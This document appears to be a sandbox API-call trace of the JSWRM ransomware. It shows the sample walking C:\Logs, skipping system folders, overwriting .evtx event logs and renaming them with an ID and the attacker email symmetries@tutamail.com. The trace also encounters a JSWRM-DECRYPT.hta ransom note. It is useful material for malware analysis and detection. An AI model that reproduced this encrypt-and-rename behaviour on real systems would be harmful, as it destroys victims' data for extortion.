lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.856] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.857] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.857] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.857] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.862] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.862] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.862] CloseHandle (hObject=0x450) returned 1 [0064.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0064.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0064.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0064.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0064.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0064.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0064.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0064.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.865] MoveFileW (lpExistingFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), lpNewFileName="C:\\Logs\\HardwareEvents.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\hardwareevents.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0064.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0064.866] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2=".") returned 1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="..") returned 1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="...") returned 1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="windows") returned -1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="recovery") returned -1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="perflogs") returned -1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="documents and settings") returned 1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="system volume information") returned -1 [0064.866] lstrcmpiW (lpString1="Internet Explorer.evtx", lpString2="msocache") returned -1 [0064.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Internet Explorer.evtx", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0064.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Internet Explorer.evtx", cchWideChar=22, lpMultiByteStr=0x2411f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Internet Explorer.evtx", lpUsedDefaultChar=0x0) returned 22 [0064.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Internet Explorer.evtx", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0064.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Internet Explorer.evtx", cchWideChar=22, lpMultiByteStr=0x240f20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Internet Explorer.evtx", lpUsedDefaultChar=0x0) returned 22 [0064.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.867] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.867] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.867] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.867] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.873] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.873] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.873] CloseHandle (hObject=0x450) returned 1 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0064.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225d30 [0064.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0064.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0064.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225d30 | out: hHeap=0x1e0000) returned 1 [0064.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.875] MoveFileW (lpExistingFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), lpNewFileName="C:\\Logs\\Internet Explorer.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\internet explorer.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.876] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4cd83c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d4cd83c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d4cd83c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.876] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.877] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2=".") returned 1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="..") returned 1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="...") returned 1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="windows") returned -1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="recovery") returned -1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="perflogs") returned -1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="documents and settings") returned 1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="system volume information") returned -1 [0064.877] lstrcmpiW (lpString1="Key Management Service.evtx", lpString2="msocache") returned -1 [0064.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Key Management Service.evtx", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0064.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Key Management Service.evtx", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Key Management Service.evtx", lpUsedDefaultChar=0x0) returned 27 [0064.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Key Management Service.evtx", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0064.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Key Management Service.evtx", cchWideChar=27, lpMultiByteStr=0x2412e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Key Management Service.evtx", lpUsedDefaultChar=0x0) returned 27 [0064.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.877] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.877] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.878] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.878] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.883] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.884] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.884] CloseHandle (hObject=0x450) returned 1 [0064.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0064.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0064.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0064.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0064.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0064.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.886] MoveFileW (lpExistingFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), lpNewFileName="C:\\Logs\\Key Management Service.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\key management service.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.886] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0064.886] lstrcmpiW 